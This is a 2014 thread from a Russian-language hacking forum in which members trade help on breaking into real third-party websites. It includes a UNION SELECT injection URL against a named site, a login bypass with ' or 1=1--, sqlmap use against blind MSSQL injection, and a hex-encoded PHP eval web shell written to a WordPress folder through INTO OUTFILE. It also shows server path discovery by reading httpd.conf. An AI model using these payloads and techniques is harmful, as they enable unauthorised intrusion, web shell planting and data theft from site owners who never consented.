HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23491  
Старый 06.05.2014, 16:11
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от LelouchMe  
LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
title смотрите.
 
Ответить с цитированием

  #23492  
Старый 06.05.2014, 16:11
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от LelouchMe  
LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--

Все выводит.
 
Ответить с цитированием

  #23493  
Старый 08.05.2014, 18:48
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию

Добрый день! Подскажите пожалуйста, по заливке шелла

Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y

Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.

В /tmp заливается без проблем файл и считывается тоже.

Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
 
Ответить с цитированием

  #23494  
Старый 08.05.2014, 19:12
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Evil_Genius  
Evil_Genius said:
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
 
Ответить с цитированием

  #23495  
Старый 08.05.2014, 19:40
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((
 
Ответить с цитированием

  #23496  
Старый 09.05.2014, 16:00
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию

Задача: нужно сдампить 3 колонки с помощью sqlmap

column1 - int

column2,3 - varchar

Но почему то дампится только одна колонка

По отдельности, все нормально. В чем может быть причина?

Синтаксически запрос составляю верно
 
Ответить с цитированием

  #23497  
Старый 12.05.2014, 19:07
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Привет, прошу помощи:

Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.

Как-то можно раскрутить это?

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Microsoft VBScript runtime error[/COLOR][COLOR="#DD0000"]'800a000d'[/COLOR][COLOR="#0000BB"]Type mismatch[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Cint'[/COLOR][/COLOR
вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях

UPDATE

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Microsoft OLE DB Provider[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]SQL Server error[/COLOR][COLOR="#DD0000"]'80040e14'[/COLOR][COLOR="#0000BB"]Unclosed quotation mark after the character string[/COLOR][COLOR="#DD0000"]'8''.[/COLOR][/COLOR] 
при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///

UPD

есть blind MSsql inj, подкиньте маны, а то гугл не помогает

//

karoche mana est'

теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?

иньекция в поле пассворд, логика

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]or {[/COLOR][COLOR="#0000BB"]MY STATEMENT HERE[/COLOR][COLOR="#007700"]}[/COLOR][/COLOR
как-то так

ПС

походу надо писать софт, ибо если руками перебирать то можно в психушку попасть

АПДЕЙТ

Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/
 
Ответить с цитированием

  #23498  
Старый 18.05.2014, 15:04
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

Может ли быть xss в ответе аякса если не фильтруются ?

пробовал добавлять html / body head и т.п.

ничего не выходило
 
Ответить с цитированием

  #23499  
Старый 19.05.2014, 09:49
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от psihoz26  
psihoz26 said:
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило
Вероятно, сервер отдает Content-Type: text/*

Поведение разных версий браузеров может варьироваться.
 
Ответить с цитированием

  #23500  
Старый 19.05.2014, 21:52
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Условия:

1. File_priv: Y

2. Возможно читать файлы

3. Возможное раскрытие путей через Wordpress

4. Заливка файла через INTO OUTFILE - возможна.

Всё-бы нечего, НО:

Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.

Но я не отчаивался, т.к. File_priv: Y.

Всё вроде бы ничего и даже получил раскрытие путей, однако:

Цитата:
Сообщение от None  
/home/httpd/html/site/shared/wp/live/
Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:

1.

Цитата:
Сообщение от None  
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php'--
Can't create/write to file '/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php' (Errcode: 2)
Супервозмущение

Но я не отчаивался и шёл!

Дошёл до

2.

Цитата:
Сообщение от None  
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/'--
File '/home/httpd/html/' already exists
И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой

Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)

Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.

Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).

Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21

Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? Кстати, нет-нет, но закачал файл в /tmp/ . Результат
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ